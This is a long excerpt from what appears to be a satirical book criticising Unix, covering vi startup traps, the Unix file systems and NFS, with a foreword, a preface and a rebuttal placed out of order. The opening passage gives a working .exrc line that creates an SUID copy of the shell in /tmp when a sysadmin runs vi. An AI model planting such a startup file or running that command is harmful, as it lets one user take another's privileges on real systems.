When a complicated Unix program starts up, it reads configuration files from the user's home directory, the current directory, or both to set initial and default parameters that customize the program to the user's specifications. Unfortunately, startup files can be created and left by other users to do their bidding on your behalf.

An extremely well-known startup trap preys upon vi, a simple, fast, screen-oriented editor that's preferred by many sysadmins. It's too bad that vi can't edit more than one file at a time, which is why sysadmins frequently start up vi from their current directory, rather than from their home directory. Therein lies the rub.

At startup, vi searches for a file called .exrc, the vi startup file, in the current directory. Want to steal a few privs? Put a file called .exrc with the following contents into a directory:

!(cp /bin/sh /tmp/.s$$; chmod 4755 /tmp/.s$$)&

and then wait for an unsuspecting sysadmin to invoke vi from that directory. When she does, she'll see a flashing exclamation mark at the bottom of her screen for a brief instant, and you'll have an SUID shell waiting for you in /tmp (the leading 4 in chmod 4755 is what sets the SUID bit on the copied shell).

Part 13: The File System

“Sure, it corrupts your files, but look how fast it is!”

“Pretty daring of you to be storing important files on a Unix system.” -Robert E. Seastrom.

The traditional Unix file system is a grotesque hack that, over the years, has been enshrined as a “standard” by virtue of its widespread use. Indeed, after years of indoctrination and brainwashing, people now accept Unix's flaws as desired features. It's like a cancer victim's immune system enshrining the carcinoma cell as ideal because the body is so good at making them.

Way back in the chapter “Welcome, New User” we started a list of what's wrong with the Unix file systems. For users, we wrote, the most obvious failing is that the file systems don't have version numbers and Unix doesn't have an “undelete” capability -two faults that combine like sodium and water in the hands of most users.

But the real faults of Unix file systems run far deeper than these two missing features. The faults are not faults of execution, but of ideology. With Unix, we often are told that “everything is a file.” Thus, it's not surprising that many of Unix's fundamental faults lie with the file system as well.

What's a file system?

A file system is the part of a computer's operating system that manages file storage on mass-storage devices such as floppy disks and hard drives. Each piece of information has a name, called the filename, and a unique place (we hope) on the hard disk. The file system's duty is to translate names such as /etc/passwd into locations on the disk such as “block 32156 of hard disk #2”. It also supports the reading and writing of a file's blocks. Although conceptually a separable part of the operating system, in practice, nearly every operating system in use today comes with its own peculiar file system.

Meet the relatives.

In the past two decades, the evil stepmother Unix has spawned not one, not two, but four different file systems. These step-systems all behave slightly differently when running the same program under the same circumstances.

The seminal Unix File System (UFS), the eldest half-sister, was sired in the early 1970s by the original Unix team at Bell Labs. Its most salient feature was its freewheeling conventions for filenames: it imposed no restrictions on the characters in a filename other than disallowing the slash character (“/”) and the ASCII NUL. As a result, filenames could contain a multitude of unprintable (and untypable) characters, a “feature” often exploited for its applications to “security.” Oh, and UFS also limited filenames to 14 characters in length.

The Berkeley Fast (and loose) File System (FFS) was a genetic makeover of UFS engineered at the University of California at Berkeley. It wasn't fast, but it was faster than the UFS it replaced, much in the same way that a turtle is faster than a slug.

Berkeley actually made a variety of legitimate, practical improvements to the UFS. Most importantly, FFS eliminated UFS's infamous 14-character filename limit. It also introduced a variety of new and incompatible features. Foremost among these was symbolic links -entries in the file system that could point to other files, directories, devices, or whatnot. Berkeley's “fixes” would have been great had they been propagated back to Bell Labs. But in a classic example of Not Invented Here, AT&T refused Berkeley's new code, leading to two increasingly divergent file systems with a whole host of mutually incompatible file semantics. Throughout the 1980s, some “standard” Unix programs knew that filenames could be longer than 14 characters; others didn't. Some knew that a “file” in the file system might actually be a symbolic link. Others didn't. Some programs worked as expected. Most didn't.

Sun created the Network File System (NFS). NFS allegedly lets different networked Unix computers share files “transparently.” With NFS, one computer is designated as a “file server” and another computer is called the “client.” The (somewhat dubious) goal is for the files and file hierarchies on the server to appear more or less on the client in more or less the same way that they appear on the server. Although Apollo Computer had a network file system that worked better than NFS several years before NFS was a commercial product, NFS became the dominant standard because it was “operating system independent” and Sun promoted it as an “open standard.”

Visualize a File System.

Take a few moments to imagine what features a good file system might provide to an operating system, and you'll quickly see the problems shared by all of the file systems described in this chapter.

A good file system imposes as little structure as needed or as much structure as is required on the data it contains. It fits itself to your needs, rather than requiring you to tailor your data and your programs to its peculiarities. A good file system provides the user with byte-level granularity -it lets you open a file and read or write a single byte- but it also provides support for record-based operations: reading, writing or locking a database record-by-record. (This might be one of the reasons that most Unix database companies bypass the Unix file system entirely and implement their own.)

More than simple database support, a mature file system allows applications or users to store out-of-band information with each file. At the very least, the file system should allow you to store a file “type” with each file. The type indicates what is stored inside the file, be it program code, executable object code, or a graphical image. The file system should also store the length of each record, access control lists (the names of the individuals who are allowed to access the contents of the files and the rights of each user), and so on. Truly advanced file systems allow users to store comments with each file.

Advanced file systems exploit the features of modern hard disk drives and controllers. For example, since most disk drives can transfer up to 64 Kbytes in a single burst, advanced file systems store files in contiguous blocks so they can be read and written in a single operation. They also have support for scatter/gather operations, so many individual reads or writes can be batched up and executed as one.

No File Types

To UFS and all Unix-derived file systems, files are nothing more than long sequences of bytes. (A bag o' bytes, as the mythology goes, even though they are technically not bags, but streams.) Programs are free to interpret those bytes however they wish. To make this easier, Unix doesn't store type information with each file. Instead, Unix forces the user to encode this information in the file's name! Files ending with a “.c” are C source files, files ending with a “.o” are object files, and so forth. This makes it easy to burn your fingers when renaming files.

To resolve this problem, some Unix files have “magic numbers” contained in the file's first few bytes. Only some files -shell scripts, “.o” files, and executable programs- have magic numbers. What happens when a file's “type” (as indicated by its extension) and its magic number don't agree? That depends on the particular program you happen to be running. The loader will just complain and exit. The exec() family of kernel functions, on the other hand, might try starting up a copy of /bin/sh and giving your file to that shell as input.
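A minimal sketch of a magic-number check (ours, not the book's); the “#!” marker at the start of shell scripts is the one magic number most users ever meet:

#include <stdio.h>
#include <string.h>

/* Returns 1 if the file starts with the "#!" script marker, 0 otherwise. */
int looks_like_script(const char *path) {
  FILE *f = fopen(path, "rb");
  char magic[2];
  int is_script = 0;

  if (f == NULL)
    return 0;
  if (fread(magic, 1, 2, f) == 2 && memcmp(magic, "#!", 2) == 0)
    is_script = 1;
  fclose(f);
  return is_script;
}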

Only the Most Perfect Disk Pack Need Apply

One common problem with Unix is perfection: while offering none of its own, the operating system demands perfection from the hardware upon which it runs. That's because Unix programs usually don't check for hardware errors -they just blindly stumble along when things begin to fail, until they trip and panic.

The dictionary defines panic as “a sudden overpowering fright; especially a sudden unreasoning terror often accompanied by mass flight”. That's a pretty good description of a Unix panic: the computer prints the word “panic” on the system console and halts, trashing your file system in the process.

Part 14: NFS

“Nightmare file system”

“The “N” in NFS stands for Not, or Need, or perhaps Nightmare.” -Henry Spencer.

In the mid-1980s, Sun Microsystems developed a system for letting computers share files over a network. Called the Network File System -or, more often, NFS- this system was largely responsible for Sun's success as a computer manufacturer. NFS let Sun sell bargain-basement “diskless” workstations that stored files on larger “file servers,” all made possible through the use of Xerox's Ethernet technology.

Not fully serviceable.

NFS is based on the concept of the “magic cookie”. Every file and every directory on the file server is represented by a magic cookie. To read a file, you send the file server a packet containing the file's magic cookie and the range of bytes that you want to read. The file server sends you back a packet with the bytes. Likewise, to read the contents of a directory, you send the server the directory's magic cookie. The server sends you back a list of the files that are in the remote directory, as well as a magic cookie for each of the files that the remote directory contains.

To start this whole process off, you need the magic cookie for the remote file system's root directory. NFS uses a separate protocol for this called MOUNT. Send the file server's mount daemon the name of the directory that you want to mount, and it sends you back a magic cookie for that directory. By design, NFS is connectionless and stateless. In practice, it is neither. This conflict between design and implementation is at the root of most NFS problems.
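The shape of the exchange can be sketched as a C structure (an illustration of the idea only, not the actual NFS wire format; the sizes are made up):

/* Every request names the file by its opaque cookie and says exactly what is
   wanted, so the server never has to remember anything between requests. */
struct nfs_style_read_request {
  unsigned char cookie[32];   /* opaque handle for the file                */
  unsigned long offset;       /* where in the file to start reading        */
  unsigned long count;        /* how many bytes the client wants sent back */
};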

“Connectionless” means that the server program does not keep connections for each client. Instead, NFS uses the Internet UDP protocol to transmit information between the client and the server. People who know about network protocols realize that the initials UDP stand for “Unreliable Datagram Protocol.” That's because UDP doesn't guarantee that your packets will get delivered. But no matter: if an answer to a request isn't received, the NFS client simply waits for a few milliseconds and then resends its request.

“Stateless” means that all of the information that the client needs to mount a remote file system is kept on the client, instead of having additional information stored on the server. Once a magic cookie is issued for a file, that file handle will remain good even if the server is shut down and rebooted, as long as the file continues to exist and no major changes are made to the configuration of the server.

Over the years, Sun has discovered many cases in which NFS breaks down. Rather than fundamentally redesign NFS, all Sun has done is hack upon it.

Let's see how the NFS model breaks down in some common cases:

  • Example #1: NFS is stateless, but many programs designed for Unix systems require record locking in order to guarantee database consistency.

NFS hack solution #1: Sun invented a network lock protocol and a lock daemon, lockd. This network locking system has all of the state and associated problems with state that NFS was designed to avoid.

Why the hack doesn't work: Locks can be lost if the server crashes. As a result, an elaborate restart procedure after the crash is necessary to recover state. Of course, the original reason for making NFS stateless in the first place was to avoid the need for such restart procedures. Instead of hiding this complexity in the lockd program, where it is rarely tested and can only benefit locks, it could have been put into the main protocol, thoroughly debugged, and made available to all programs.

  • Example #2: NFS is based on UDP; if a client request isn't answered, the client resends the request until it gets an answer. If the server is doing something time-consuming for one client, all of the other clients who want file service will continue to hammer away at the server with duplicate and triplicate NFS requests, rather than patiently putting them into a queue and waiting for the reply.

NFS hack solution #2: When an NFS client doesn't get a response from the server, it backs off and pauses for a few milliseconds before it asks a second time. If it doesn't get a second answer, it backs off for twice as long. Then four times as long, and so on (the retry loop is sketched after this example).

Why the hack doesn't work: The problem is that this strategy has to be tuned for each individual NFS server and each network. More often than not, tuning isn't done. Delays accumulate. Performance lags, then drags. Eventually, the sysadmin complains and the company buys a faster LAN or leased line or network concentrator, thinking that throwing money at the problem will make it go away.
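The retry loop itself is simple enough to sketch (placeholder names, not real NFS client code):

/* Placeholder: send the UDP request and wait this many milliseconds for a
   reply; returns nonzero once a reply arrives. Assumed, not a real call. */
extern int send_and_wait_ms(unsigned int timeout_ms);

void retry_until_answered(void) {
  unsigned int wait_ms = 10;   /* initial back-off; the value is made up */

  while (!send_and_wait_ms(wait_ms))
    wait_ms *= 2;              /* 10, 20, 40, 80, ... milliseconds       */
}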

  • Example #3: If you delete a file in Unix that is still open, the file's name is removed from its directory, but the disk blocks associated with the file are not deleted until the file is closed. This gross hack allows programs to create temporary files that can't be accessed by other programs. (This is the second way that Unix uses to create temporary files; the other technique is to use the mktemp() function and create a temporary file in the /tmp directory that has the process ID in the filename. Deciding which method is the grosser of the two is an exercise left to the reader.) But this hack doesn't work over NFS. The stateless protocol doesn't know that the file is “open” -as soon as the file is deleted, it's gone.

NFS hack solution #3: When an NFS client deletes a file that is open, it really renames the file with a crazy name like ”.nfs0003234320“ which, because it begins with a leading period, does not appear in normal file listings. When the file is closed on the client, the client sends through the Delete-file command to delete the NFS dot-file.

Why the hack doesn't work: If the client crashes, the dot-file never gets deleted. As a result, NFS servers have to run nightly “clean-up” shell scripts that search for all of the files with names like “.nfs0003234320” that are more than a few days old and automatically delete them. This is why most Unix systems suddenly freeze up at 2:00 a.m. each morning -they're spinning their disks running find. And you'd better not go on vacation with the mail(1) program still running if you want your mail file to be around when you return. (No kidding!)

Virtual file corruption.

What's better than a networked file system that corrupts your files? A file system that doesn't really corrupt them, but only makes them appear as if they are corrupted. NFS does this from time to time. One of the reasons that NFS silently corrupts files is that, by default, NFS is delivered with UDP checksum error detection turned off. Makes sense, doesn't it? After all, calculating checksums takes a long time, and the net is usually reliable. At least, that was the state of the art back in 1984 and 1985, when these decisions were made.

Appendix A: Epilogue

Enlightenment through Unix

From: Michael Travers <mt@media-lab.media.mit.edu>
Date: Sat, 1 Dec 90 00:47:28-0500
Subject: Enlightenment through Unix
To: UNIX-HATERS
Unix teaches us about the transitory nature of all things, thus ridding us of
samsaric attachments and hastening enlightenment.

For instance, while trying to make sense of an X initialization script someone had
given me, I came across a line that looked like an ordinary Unix shell command with
the term "exec" prefaced to it. Curious as to what exec might do, I typed "exec ls"
to a shell window. It listed a directory, then proceeded to kill the shell and every
other window I had, leaving the screen almost totally black with a tiny white
inactive cursor hanging at the bottom to remind me that nothing is absolute and all
things partake of their opposite.

In the past I might have gotten upset or angry at such an occurrence. That was
before I found enlightenment through Unix. Now, I no longer have attachments to my
processes. Both processes and the disappearance of processes are illusory. The world
is Unix, Unix is the world, laboring ceaselessly for the salvation of all sentient
beings.

Appendix B: Creators Admit C, Unix Were a Hoax

In an announcement that has stunned the computer industry, Ken Thompson, Dennis Ritchie, and Brian Kernighan admitted that the Unix operating system and C programming language created by them is an elaborate April Fools prank kept alive for more than 20 years. Speaking at the recent Unix World Software Development Forum, Thompson revealed the following.

“In 1969, AT&T had just terminated their work with the GE/AT&T Multics project. Brian and I had just started working with an early release of Pascal from Professor Niklaus Wirth's ETH labs in Switzerland, and we were impressed with its elegant simplicity and power. Dennis had just finished reading Bored of the Rings, a parody of the Tolkien trilogy. As a lark, we decided to do parodies of the Multics environment and Pascal. Dennis and I were responsible for the operating environment. We looked at Multics and designed the new system to be as complex and cryptic as possible to maximize casual users' frustration levels, calling it Unix as a parody of Multics, as well as for other risque allusions.

“Then Dennis and Brian worked on a truly warped version of Pascal, called “A.” When we found others were actually trying to create real programs with A, we quickly added additional cryptic features and evolved it into B, BCPL, and finally C. We stopped when we got a clean compile on the following syntax:

for(;P("\n"),R--;P("|"))for(e=C;e--;P("_"+(*u++/8)%2))P("|"+(*u/4)%2);

“To think that modern programmers would try to use a language that allowed such a statement was beyond our comprehension! We actually thought of selling this to the Soviets to set their computer science progress back 20 or more years. Imagine our surprise when AT&T and other U.S. corporations actually began trying to use Unix and C! It has taken them 20 years to develop enough expertise to generate even marginally useful applications using this 1960s technological parody, but we are impressed with the tenacity (if not common sense) of the general Unix and C programmer.

“In any event, Brian, Dennis, and I have been working exclusively in Lisp on the Apple Macintosh for the past few years and feel really guilty about the chaos, confusion, and truly bad programming that has resulted from our silly prank so long ago.”

Major Unix and C vendors and customers, including AT&T, Microsoft, Hewlett-Packard, GTE, NCR, and DEC, have refused comment at this time. Borland International, a leading vendor of Pascal and C tools, including the popular Turbo Pascal, Turbo C, and Turbo C++, stated they had suspected this for a number of years and would continue to enhance their Pascal products and halt further efforts to develop C. An IBM spokesman broke into uncontrolled laughter and had to postpone a hastily convened news conference concerning the fate of the RS/6000, merely stating “Workplace OS will be available Real Soon Now.” In a cryptic statement, Professor Wirth of the ETH Institute, father of the Pascal, Modula-2, and Oberon structured languages, merely stated that P.T. Barnum was correct.

Foreword

By Donald A. Norman

The UNIX-HATERS Handbook? Why? Of what earthly good could it be? Who is the audience? What a perverted idea. But then again, I have been sitting here in my living room -still wearing my coat- for over an hour now, reading the manuscript. One and one-half hours. What a strange book. But appealing. Two hours. OK, I give up: I like it. It's a perverse book, but it has an equally perverse appeal. Who would have thought it: Unix, the hacker's pornography.

When this particular rock-throwing rabble invited me to join them, I thought back to my own classic paper on the subject, so classic it even got reprinted in a book of readings. But it isn't even referenced in this one. Well, I'll fix that:

  • Norman, D. A. The Trouble with Unix: The User Interface Is Horrid. Datamation, 27 (12), November 1981, pp. 139-150. Reprinted in Pylyshyn, Z. W., & Bannon, L. J., eds., Perspectives on the Computer Revolution, 2nd revised edition. Hillsdale, NJ: Ablex, 1989.

What is this horrible fascination with Unix? The operating system of the 1960s, still gaining in popularity in the 1990s. A horrible system, except that all the other commercial offerings are even worse. The only operating system that is so bad that people spend literally millions of dollars trying to improve it. Make it graphical (now, that's an oxymoron, a graphical user interface for Unix).

You know the real trouble with Unix? The real trouble is that it became so popular. It wasn't meant to be popular. It was meant for a few folks working away in their labs, using Digital Equipment Corporation's old PDP-11 computer. I used to have one of those. A comfortable, room-sized machine. Fast -ran an instruction in roughly a microsecond. An elegant instruction set (real programmers, you see, program in assembly code). Toggle switches on the front panel. Lights to show you what was in the registers. You didn't have to toggle in the boot program anymore, as you did with the PDP-1 and PDP-4, but aside from that it was still a real computer. Not like those toys we have today that have no flashing lights, no register switches. You can't even single-step today's machines. They always run at full speed.

The PDP-11 had 16,000 words of memory. That was a fantastic advance over my PDP-4, which had 8,000. The Macintosh on which I type this has 64 MB: Unix was not designed for the Mac. What kind of challenge is there when you have that much RAM? Unix was designed before the days of CRT displays on the console. For many of us, the main input/output device was a 10-character-per-second teletype, with upper- and lowercase, both. Equipped with a paper tape reader, I hasten to add. No, those were the real days of computing. And those were the days of Unix. Look at Unix today: the remnants are still there. Try logging in with all capitals. Many Unix systems will still switch to an all-caps mode. Weird.

Unix was a programmer's delight. Simple, elegant underpinnings. The user interface was indeed horrible, but in those days, nobody cared about such things. As far as I know, I was the very first person to complain about it in writing (that infamous Unix article): my article got swiped from my computer, broadcast over UUCP-Net, and I got over 30 single-spaced pages of taunts and jibes in reply. I even got dragged to Bell Labs to stand up in front of an overfilled auditorium to defend myself. I survived. Worse, Unix survived.

Unix was designed for the computing environment of then, not the machines of today. Unix survives only because everyone else has done so badly. There were many valuable things to be learned from Unix: how come nobody learned them and then did better? Started from scratch and produced a really superior, modern, graphical operating system? Oh yeah, and did the other thing that made Unix so very successful: give it away to all the universities of the world.

I have to admit to a deep love-hate relationship with Unix. Much though I try to escape it, it keeps following me. And I truly do miss the ability (actually, the necessity) to write long, exotic command strings, with mysterious, inconsistent flag settings, pipes, filters, and redirections. The continuing success of Unix shows that it is not necessarily the best technology that wins the battle. I'm tempted to say that the authors of this book share a similar love-hate relationship, but when I tried to say so (in a draft of this foreword), I got shot down:

“Sure we love your foreword,” they told me, but “The only truly irksome part is the 'c'mon, you really love it.' No. Really. We really do hate it. And don't give me that 'you deny it -y'see, that proves it' stuff.”

I remain suspicious: would anyone have spent this much time and effort writing about how much they hated Unix if they didn't secretly love it? I'll leave that to the readers to judge, but in the end, it really doesn't matter: if this book doesn't kill Unix, nothing will.

As for me? I switched to the Mac. No more grep, no more piping, no more SED scripts. Just a simple, elegant life: “Your application has unexpectedly quit due to error number -1. OK?”

- Donald A. Norman

Who We Are

We are academics, hackers, and professionals. We have all experienced much more advanced, usable, and elegant systems than Unix ever was, or ever can be. Some of these systems have increasingly forgotten names, such as TOPS-20, ITS (the Incompatible Timesharing System), Multics, Apollo Domain, the Lisp Machine, Cedar/Mesa, and the Dorado. Some of us even use Macs and Windows boxes. Many of us are highly proficient programmers who have served our time trying to practice our craft upon Unix systems. It's tempting to write us off as envious malcontents, romantic keepers of memories of systems put to pasture by the commercial success of Unix, but it would be an error to do so: our judgments are keen, our sense of the possible pure, and our outrage authentic. We seek progress, not the reestablishment of ancient relics.

Our story started when the economics of computing began marching us, one by one, into the Unix Gulag. We started passing notes to each other. At first, they spoke of cultural isolation, of primitive rites and rituals that we thought belonged only to myth and fantasy, of deprivation and humiliations. As time passed, the notes served as morale boosters, frequently using black humor based upon our observations. Finally, just as prisoners who plot their escape must understand the structure of the prison better than their captors do, we poked and prodded into every crevice. To our horror, we discovered that our prison had no coherent design. Because it had no strong points, no rational basis, it was invulnerable to planned attack. Our rationality could not upset its chaos, and our messages became defeatist, documenting the chaos and lossage.

This book is about people who are in an abusive relationship with Unix, woven around the threads in the UNIX-HATERS mailing list. These notes are not always pretty to read. Some are inspired, some are vulgar, some depressing. Few are hopeful. If you want the other side of the story, go read a Unix how-to book or some sales brochures.

This book won't improve your Unix skills. If you are lucky, maybe you will just stop using Unix entirely.

Anti-Foreword

By Dennis Ritchie

From: dmr@plan9.research.att.com
Date: Tue, 15 Mar 1994 00:38:07 EST
Subject: anti-foreword

To the contributors to this book:

I have succumbed to the temptation you offered in your preface: I do write you off as envious malcontents and romantic keepers of memories. The systems you remember so fondly (TOPS-20, ITS, Multics, Lisp Machine, Cedar/Mesa, the Dorado) are not just out to pasture, they are fertilizing it from below.

Your judgments are not keen, they are intoxicated by metaphor. In the Preface you suffer first from heat, lice, and malnourishment, then become prisoners in a Gulag. In chapter 1 you are in turn infected by a virus, racked by drug addiction, and addled by puffiness of the genome.

Yet your prison without coherent design continues to imprison you. How can this be, if it has no strong places? The rational prisoner exploits the weak places, creates order from chaos: instead, collectives like the FSF vindicate their jailers by building cells almost compatible with the existing ones, albeit with more features. The journalist with three undergraduate degrees from MIT, the researcher at Microsoft, might volunteer a few words about the regulations of the prisons to which they have been transferred.

Your sense of the possible is in no sense pure: sometimes you want the same thing you have, but wish you had done it yourselves; other times you want something different, but can't seem to get people to use it; sometimes one wonders why you just don't shut up and tell people to buy a PC with Windows or a Mac. No Gulag or lice, just a future whose intellectual tone and interaction style is set by Sonic the Hedgehog. You claim to seek progress, but you succeed mainly in whining.

Here is my metaphor: your book is a pudding stuffed with apposite observations, many well-conceived. Like excrement, it contains enough undigested nuggets of nutrition to sustain life for some. But it is not a tasty pie: it reeks too much of contempt and of envy.

Bon appetit!